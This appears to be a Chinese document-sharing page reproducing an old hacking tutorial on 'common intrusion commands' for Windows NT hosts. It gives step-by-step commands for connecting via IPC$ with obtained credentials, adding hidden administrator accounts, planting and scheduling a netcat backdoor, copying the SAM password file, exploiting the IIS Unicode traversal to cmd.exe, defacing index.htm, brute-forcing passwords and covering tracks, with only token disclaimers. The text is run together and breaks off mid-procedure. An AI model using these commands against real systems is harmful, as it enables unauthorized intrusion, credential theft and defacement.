入侵常用命令详解.docx
《入侵常用命令详解.docx》由会员分享,可在线阅读,更多相关《入侵常用命令详解.docx(16页珍藏版)》请在冰点文库上搜索。
入侵常用命令详解
1:
NET
只要你拥有某IP的用户名和密码,那就用IPC$做连接吧!
这里我们假如你得到的用户是:
风明月清,密码是123456。
假设对方IP为127.0.0.1
netuse\\127.0.0.1\ipc$123456/user:
风明月清null密码为空
退出的命令是
netuse\\127.0.0.1\ipc$/delete
--------------------------------
netshare是查看主机共享资源我们用它建一个秘密共享目录吧netshareme=c:
\winnt\system32这样这个机器就有了一个名为me的共享目录,而打开它就是winnt下的system32目录,如果你用win2000的系统就知这个目录有多重要了,如果不想要也好办netshareme/delete。
------------------------------------------------------------------
下面的操作你必须登陆后才可以用.登陆的方法就在上面.
------------------------------------------------------------------
下面我们讲怎么创建一个用户,由于SA的权限相当于系统的超级用户.
我们加一个heibai的用户密码为123456
netuserheibai123456/add
只要显示命令成功,那么我们可以把他加入Administrator组了.
netlocalgroupAdministratorsheibai/add
----------------------
这里是讲映射对方的C盘,当然其他盘也可以,只要存在就行了.我们这里把对方的C盘映射到本地的Z盘.
netusez:
\\127.0.0.1\c$
----------------------
netstarttelnet
这样可以打开对方的TELNET服务.
其实,打开还有两种方法,一种是用netstarttlntsvr打开,一种是用tlntadmn工具打开(关闭也是)。
且仅仅打开默认情况下是Windows是不能提供Telnet服务的,需要用下面所述的tlntadmn工具消掉NTLM验证,用PASSWORD验证时,才可以提供用户名和密码的访问。
tlntadmn命令如下:
C:
\>tlntadmn
请在下列选项中选择一个:
0)退出这个应用程序
1)列出当前用户
2)结束一个用户的会话...
3)显示/更改注册表设置...
4)开始服务
5)停止服务
请键入一个选项的号码[0-5]以选择该选项:
3(如上所述:
也可在这里打开或关闭Telnet服务)
请在下列选项中选择一个:
0)退出这个菜单
1)AllowTrustedDomain
2)AltKeyMapping
3)DefaultDomain
4)DefaultShell
5)LoginScript
6)MaxFailedLogins
7)NTLM
8)TelnetPort
请键入一个选项的号码[0-8]以选择该选项:
7
NTLM的当前值=2
您确实想更改这个值吗?
[y/n]y
NTLM[当前值=2;可接受的值0、1或2]:
0
您确实想将NTLM设置为:
0?
[y/n]y
只有当Telnet服务重新开始后设置才会生效,切记!
按一下0,5,4即可。
在XP中tlntadmn只能用命令来输入,关闭NTLM的命令是tlntadmnconfigsec=-ntlm
----------------------
这里是将Guest用户激活,guest是NT的默认用户,而且无法删除呢。
netuserguest/actives
----------------------
netuserguest/active:
no这样这个guest的用户就又被禁用了
----------------------
这里是把一个用户的密码改掉,我们把guest的密码改为123456,其他用户也可以的。
只要有权限就行了呀!
netuserguestlovechina
有人问到提高权限的问题下面就解决下
netlocalgroupadministratorsguest/add
将guest变为administrator
net命令果然强大啊!
netview命令看对方开了共享
-------------------------------------------------------------------------------------------------------------
netuser是查看所有用户列表,看看哪个用户是和你一样偷跑进来的,把他给解决了.
netuser用户名/delete,不过我们还是查一下管理员组有什么用户吧,这样的用户才对我们有用嘛netlocalgroupadministrators就列出管理员组成员了,再查看一下administrator这个用户,因为这个是创建系统时建出来的,所以要看看他的系统是什么时间创建出来的
netuseradministrator,然后再查看别的管理员用户是什么时间创建的,如果相差太远,那可能是被别人偷偷跑来偷建的,一律del,安全第一哦................
---------------------------------------------------------------------------------------------------------------------------
2:
at
一般一个入侵者入侵后都会留下后门,也就是种木马了,你把木马传了上去,怎么启动他呢?
那么需要用AT命令,这里假设你已经登陆了那个服务器。
----------------------
你首先要得到对方的时间,
nettime\\127.0.0.1
----------------------
将会返回一个时间,这里假设时间为12:
1,现在需要新建一个作业,其ID=1
at\\127.0.0.112:
3nc.exe
这里假设了一个木马,名为NC.EXE,这个东西要在对方服务器上.
这里介绍一下NC,NC是NETCAT的简称,为了方便输入,一般会被改名.它是一个TELNET服务,端口为99.
等到了12:
3就可以连接到对方的99端口.这样就给对方种下了木马.
-----------------------------------------------------
at命令功能强大,下面可以打个比方:
C:
\>AT22:
30StartC:
\prettyboy.mp3
新加了一项作业,其作业ID=1[现在我们新建立了一个任务在22:
30分系统将自动播放歌曲]
---------------------------------------------------------------------------------------------------------------------------
3:
telnet
这个命令非常实用,它可以与远方做连接,不过正常下需要密码、用户,不过你给对方种了木马,直接连到这个木马打开的端口.
telnet127.0.0.199
这样就可以连到对方的99端口.那你就可以在对方运行命令了,这个也就是肉鸡.
---------------------------------------------------------------------------------------------------------------------------
4:
FTP
它可以将你的东西传到对方机子上,你可以去申请个支持FTP上传的空间,国内多的是,或者你也可以用Serv-U等软件自己搭建你自己的ftp,呵呵.自己的电脑要怎么就怎么操作.
在上传前需要登陆先,这里我们假设FTP服务器WWW,用户名是kingzoo,密码是654321
ftp
他会要求输入用户,成功后会要求输入密码.
----------------------
下面先说上传,假设你需上传的文件是INDEX.HTM,它位于C:
\下,传到对方D:
\
getc:
\index.htmd:
\
假设你要把对方C盘下的INDEX.HTM,下到你的机子的D盘下
putc:
\index.htmd:
\
--------------------------------------------------
这里的问题是两个命令的解释正好弄反了,登陆FTP服务器后get才是下载,而put命令是上传,这和tftp的命令正好相反,在tftp命令里get是上传put是下载,这下明白了吧,而且在FTP服务器中不能用c:
\和d:
\这样来指明路径,这也是在tftp里面用的方法,FTP可不会执行的,不信你去试好了,正确应该这样上传文件putindex.htm这样就足够了,装c盘根目录下的index.htm文件上传到FTP服务器的当前目录下,不喜欢就delindex.htm删掉这文件,下载时先查看一下目录,dir然后看这个目录里有什么,有你要的你就getindex.htm这样就把index.htm这个文件下载到你自己的c盘根目录下了。
5:
copy
下面我说说怎样把本地的文件复制到对方硬盘上去,需要建立好IPC$连接才有效。
这里我们把本地C盘下的index.htm复制到127.0.0.1的C盘下
copyindex.htm\\127.0.0.1\c$\index.htm
----------------------
如果你要复制到D盘下把C改为D,就行了!
copyindex.htm\\127.0.0.1\d$\index.htm
----------------------
如果你要把他复制到WINNT目录里
就要把输入
copyindex.htm\\127.0.0.1\admin$\index.htm
admin$是winnt
---------------------
要把对方的文件复制过来,顺便告诉大家NT的备份的数据库放在x:
\winnt\repair\sam._sam._是数据库的文件名
--------------------------------------------
下面就把127.0.0.1的数据库复制到本地C盘下
copy\\127.0.0.1\admin$\repair\sam._c:
\
这个sam._这明显是NT主机的口令档,如果是win2000机器的口令文件应该是sam
---------------------------------------------------------------------------------------------------------------------------
6:
set
如果你跑进了一部机子,而且想黑他(这思想只能在特别时候才准有,记住一定不要学坏哦,到时候不管我大象的事情哦,呵呵~`我只授你一渔不给你鱼,呵呵),当然他的80端口要开,不然你黑给谁看。
这时需要用SET命令!
下面是我得到的结果!
我来分析它,只是找主页在那而已。
COMPUTERNAME=PENTIUMII
ComSpec=D:
\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=*/*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=当前登陆者的IP,这里本来是显示我的IP,被我删除了
HTTP_ACCEPT_ENCODING=gzip,deflate
HTTP_USER_AGENT=Mozilla/4.0(compatible;MSIE5.0;Windows98;DigExt)
NUMBER_OF_PROCESSORS=1
Os2LibPath=D:
\WINNT\system32\os2\dll;
OS=Windows_NT
Path=D:
\WINNT\system32;D:
\WINNT
PATHEXT=.COM;.EXE;.BAT;.CMD
PATH_TRANSLATED=E:
\vlroot主页放在的地址,只要你看到PATH_TRANSLATED=的后面就是主页的存放地址。
这里是E:
\vlroot
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86Family6Model3Stepping3,GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0303
PROMPT=$P$G
QUERY_STRING=/c+set
REMOTE_ADDR=XX.XX.XX.XX
REMOTE_HOST=XX.XX.XX.XX
REQUEST_METHOD=GET
SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd.exe
SERVER_NAME=XX.XX.XX.XX
SERVER_PORT=80
SERVER_PORT_SECURE=0
SERVER_PROTOCOL=HTTP/1.1
SERVER_SOFTWARE=Microsoft-IIS/3.0对方使用IIS/3.0
SystemDrive=D:
SystemRoot=D:
\WINNT
TZ=GMT-9
USERPROFILE=D:
\WINNT\Profiles\DefaultUser
windir=D:
\WINNT
这里告诉大家一个技巧,很笨的技巧啊,不过只能用这个方法才能100%的找到主页的名称,当你DIR这个目录时,一定会看到很多文件,你可以把所有文件在浏览器这样输入XX.XX.XX.XX/文件名,这样只要看到和XX.XX.XX.XX看到的也面一模一样,那么这就是主页的名称了。
其实找主页也不是很难,能进去了,爱怎么折腾是你的事哦,真的不明白,你就蠢点,笨点,哈哈,把它全部下下来,慢慢看呀.呵呵~~~~我可没有这样的时间~
---------------------------------------------------------------------------------------------------------------------------
7:
nbtstat
如果你扫到一部NT的机子,他的136到139其中一个端口开了的话,就要用这个命令得到用户了。
顺便告诉大家这是netbios,得到用户名后就可以猜猜密码了。
例如比较简单的密码,密码和用户名一样的,都试下,不行就暴力破解吧!
现在网上很多NT的机子都开了这些端口的,你可以练习下,我们来分析得到的结果。
命令是
nbtstat-AXX.XX.XX.XX
-A一定要大写哦。
这个我认为大不大写没有太大差别,用处还是一样的。
之后用netuse\\对方IP连接一下!
netview\\对方IP查看对方共享文件夹
netuseX:
\\IP\对方共享文件映射对方共享文件夹成为本机的X盘
这就是139端口的基本用法!
不过前提是必须对方开共享!
netstat-n看看谁连接你
-----------------
下面是得到的结果。
NetBIOSRemoteMachineNameTable
NameTypeStatus
---------------------------------------------
RegisteredRegisteredRegisteredRegisteredRegisteredRegisteredRegisteredReg
isteredRegisteredRegisteredRegistered
MACAddress=00-E0-29-14-35-BA
PENTIUMII<00>UNIQUE
PENTIUMII<20>UNIQUE
ORAHOTOWN<00>GROUP
ORAHOTOWN<1C>GROUP
ORAHOTOWN<1B>UNIQUE
PENTIUMII<03>UNIQUE
INet~Services<1C>GROUP
IS~PENTIUMII...<00>UNIQUE
ORAHOTOWN<1E>GROUP
ORAHOTOWN<1D>UNIQUE
..__MSBROWSE__.<01>GROUP
上面就会有记录登陆过这部系统的用户,可能你不知道怎么看,大家是不是看到了一窜数字,只要这窜数字是<03>的话,那他前面的就是用户.这里的用户是PENTIUMII。
没有03说明:
MAC没和IP捆在一起了哈哈,大家这下要小心了哦,出去的时候要注意打扫卫生哦,不要留了脚印,但这个你可不能笨的,偷进了一个网站,出来没有清理现场,人家进去就发现他来过.呵呵.怎么清理,哈哈~~~自己想下哦~~~千万不要format人家电脑哦,搞破坏那是不行的,你不要把自己的快乐建立别人的身上哦。
---------------------------------------------------------------------------------------------------------------------------
8:
Shutdown
关了对方的NT服务器的命令
Shutdown\\IP地址t:
20
20秒后将NT自动关闭,三思后才能运行这个命令,这样对对方造很大的损失,要做个有良心的入侵者呀。
Telnet进去用命令或者是本地用什么软件重启对方电脑
shutdown-m\\计算机名称可以远程重起或关闭的
--------------------------------------------------------------------------------
9:
DIR
这个命令没什么好讲,但是却非常重要,他是查看一目录里的所有文件、文件夹。
你可以本地试下。
--------------------------------------------------------------------------------
10:
echo
著名的漏洞Unicode,这个命令可以简单的黑一下有这个漏洞的主机。
我们假设我们要把“XX到此一游!
”写入index.htm,有2种方法,大家看看有什么区别。
-------------------------------------------------------
echoXX到此一游!
>index.htm
echoXX到此一游!
>>index.htm
-------------------------------------------------------
第一个的意思是覆盖index.htm原有的内容,把“XX到此一游!
”写进index.htm。
第二个的意思是把“XX到此一游!
”加到index.htm里面。
-------------------------------------------------------
“>>”产生的内容将追加进文件中,“>”则将原文件内容覆盖。
这里说明一下,<和>是重定向命令只是一个是输入重定向另一个是输出重定向,比如我们在命令提示符下就会显示c:
\>这个意思就是把C盘的命令权重定向给我们,同样:
也是定向的命令也叫作管道,它是用来连接两个命令的管道,先执行管道左边的命令,再执行管道右边的命令,不过我是没能耐把DOS命令说明白的,想研究就买本dos大全看吧,够看半年的了。
其实,我也不笨到这样程度,写上“XX到此一游”,要写也找个人来替死~~~哈哈~你可千万不要那么毒。
-------------------------------------------------------
大家可以本地试下。
可能你会问,这样简单黑下有什么好玩的,其实他可以用来下载主页到对方的目录里。
1、首先,我们需要申请一个免费的主页空间。
2、用echo在可写目录下建立如下内容的txt文件:
(以chinren服务器为例。
)
open(你的FTP服务器,申请时你的空间提供商会给你的)
cnhack(你申请时的用户名)
test(你申请时的密码)
getindex.htmc:
\inetpub\wwwroot\index.htm(这里是把你空间上的index.htm下载到对方的c:
\inetpub\wwwroot\index.htm)
bye(退出FTP对话,相当在98下的DOS,用EXIT退出DOS)
---------------------------------------------
具体的做法:
输入echoopen>c:
\cnhack.txt
输入echo
升级会员 